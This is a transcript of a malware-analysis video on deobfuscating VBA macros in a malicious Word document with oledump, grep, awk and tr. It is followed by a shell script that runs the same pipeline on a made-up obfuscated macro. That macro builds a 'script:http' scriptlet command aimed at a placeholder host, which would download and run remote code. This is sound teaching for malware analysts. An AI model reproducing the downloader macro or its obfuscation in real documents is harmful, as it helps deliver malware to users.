Hello, I'm Didier Stevens. In this video I'm going to analyze a malicious document. I'll use my oledump tool to analyze the Word document, but then I'm just going to use standard Linux tools, older tools, to analyze the macro code, the VBA code. So let's start with oledump. This is our sample, and stream 8 contains macros. There are a lot of VBA lines. So let's take a look at this: select stream 8 and decompress the VBA macros. And here indeed we have our macros. Probably a lot of obfuscation here, meaningless code, and we need to find the code that actually interests us. Now I once wrote a diary entry on the Internet Storm Center with one simple method to try to find the important code, and that is grepping for dots, because a dot, a single dot, is used in method invocation. So with that we can select lines that have a method invocation. But here, unfortunately, we get a lot of output; usually you don't get that much. And that's because of the Debug.Assert here, which contains a dot. Now the Debug.Assert here is just obfuscation. So again I'm going to use grep to get rid of it: I'm going to invert the selection and select Debug.Assert. This way I select everything that doesn't contain Debug.Assert. Okay, and I still have a lot of code here. You can see a lot of variable assignments that receive the result of the function Int with a float. So that's probably obfuscation too. So let's get rid of that too, again with grep -v, like this. Okay, and now we end up with just a couple of lines: two Application.Runs. That's what we were looking for. And this one here is TextPointer26. And now we also have those two lines here with TextPointer; that's because they contain a dot. And that's lucky for us, because now we can actually see that TextPointer26 is a string concatenation, an obfuscated string concatenation, and probably the command here is somewhere in those lines. So let's grep for TextPointer26, like this.
And indeed, here this is string concatenation. You have TextPointer26 set to an empty string, and then each time a concatenation with the output of the IIf function, where, depending on this expression, it will select this string or this string. Now if you take a close look here at this first column, you can see s, c, r, i, p, t, colon, h, t, t, p. So this reads as script:http and so on. So this is actually the script that we want. So we're going to select those strings here, concatenate them and extract our command. Now we just want these lines with the IIf, not the TextPointer line and not this one here. So instead of grepping for TextPointer I'm going to grep for the IIf function. And that's indeed what we want. Now one way to select this string here is to use the awk tool, because you could say that each line here is a record composed of three fields, where the comma is the field separator. So this is field one, this is field two and this is field three, and we are interested in field two. We can select this with awk: the separator is the comma, and I'm going to print field number two, like this. And then indeed we can see our script:http. Now we want to concatenate this and also get rid of the space and the double quote. And we can do that with the translate command, tr, and delete those characters we don't want: we don't want the space, we don't want the double quote (but I should escape this), and we don't want a newline, because we want to concatenate, like this. And here we have our command: script:http... So it will download this scriptlet and then execute it, provided this scriptlet moniker has not been blocked by recent patches from Microsoft.
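The grep / grep -v / awk / tr pipeline described in the video, as an added example in POSIX shell; it is not part of the original video or of oledump. It runs against a constructed VBA fragment embedded in the script, made up for this example to mimic the obfuscation pattern (Debug.Assert noise, Int() noise, a string built from IIf calls), so it works offline with no sample document. The variable name TextPointer26 is taken from the transcript; the URL the fragment spells out is a placeholder. The last function goes slightly beyond the video by splitting on the double quote instead of the comma and selecting either branch of the IIf.

```shell
#!/bin/sh
# Added example, not from the video. Constructed VBA fragment that mimics
# the obfuscation pattern: Debug.Assert noise, Int() noise, and a command
# assembled one character at a time with IIf. The URL is a placeholder.
vba_sample() {
cat <<'EOF'
Sub AutoOpen()
    Debug.Assert (Doc.Name = "")
    Noise1 = Int(3.7)
    Noise2 = Int(12.5)
    TextPointer26 = ""
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "s", "q")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "c", "w")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "r", "e")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "i", "r")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "p", "t")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "t", "y")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, ":", "u")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "h", "i")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "t", "o")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "t", "p")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "p", "a")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, ":", "s")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "/", "d")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "/", "f")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "e", "g")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "x", "h")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "a", "j")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "m", "k")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "p", "l")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "l", "z")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "e", "x")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, ".", "c")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "c", "v")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "o", "b")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "m", "n")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "/", "m")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "x", "q")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, ".", "w")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "s", "e")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "c", "r")
    TextPointer26 = TextPointer26 & IIf(Noise1 > 0, "t", "t")
    Application.Run "Helper", TextPointer26
End Sub
EOF
}

# Step 1 from the video: keep lines containing a dot (method invocation),
# then drop the Debug.Assert and Int() noise. What survives is the
# Application.Run line plus the two IIf lines whose string literal is a dot.
find_method_calls() {
    vba_sample | grep '\.' | grep -v 'Debug\.Assert' | grep -v 'Int('
}

# Step 2, the pipeline as typed in the video: restrict to the IIf lines of
# TextPointer26, take comma-separated field 2 (the first string literal),
# and let tr delete the space, the double quote and the newline so the
# single characters join into one command.
extract_command() {
    vba_sample | grep 'TextPointer26' | grep 'IIf' \
        | awk -F, '{ print $2 }' | tr -d ' "\n'
}

# Variant (beyond the video): split on the double quote instead of the
# comma, so a comma inside the IIf condition cannot shift the fields, and
# pick branch 1 (true, field 2) or branch 2 (false, field 4).
extract_branch() {
    col=$(( $1 * 2 ))
    vba_sample | grep 'IIf(' | awk -F'"' -v c="$col" '{ print $c }' | tr -d '\n'
}

# Stand-alone usage
find_method_calls
extract_command; echo
extract_branch 2; echo
```

In the video the true branch of every IIf happened to hold the payload; in another sample the condition decides per line, so look at both columns, or evaluate the condition, before trusting one of them. A comma inside a condition would also shift awk's comma-separated fields, which is why the quote-separated variant is worth keeping next to the original pipeline.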